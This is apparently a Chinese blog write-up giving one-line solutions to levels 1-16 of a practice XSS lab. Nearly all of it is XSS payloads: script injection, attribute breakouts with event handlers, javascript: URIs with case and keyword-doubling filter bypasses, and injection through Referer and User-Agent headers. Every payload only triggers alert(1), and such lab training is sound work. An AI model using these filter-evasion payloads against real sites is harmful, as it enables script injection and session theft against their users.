vulstudy之XSS-challenge-tour靶场(1-16)

第一关：

<script>alert(/xss/)</script>

 

第二关：

"><script>alert(1)</script>

第三关：

' onfocus='alert(1)'

第四关：

" onclick="alert(1)"

第五关：

"><a href=javascript:alert(1)>

第六关：

"><a HREF=javascript:alert(1)>

第七关：

"><a href=javascscriptript:alert(1)>

 第八关：

javascript:alert(1)

 第九关：

javascript:alert(1)//http://

 

 第十关：

?t_sort=" onfocus=alert(1) type=text "

第十一关：

Referer: "type="text" autofocus onfocus="alert(1)"

 第十二关:

User-Agent: " type="text" autofocus onfocus="alert(1)"

第十三关不知道为什么php报错了，没能够写，但是看了一下后台的源码，和第十二、第十一关差不多，只是将xss点放在了cookie上而已

第十四关的网页打开不知道是干啥的。。。，也没有写

第十五关：

'level1.php?name=test<img src=1 onerror=alert(1)>'

第十六关:

<img%0Asrc=1%0Aonerror=alert(1)>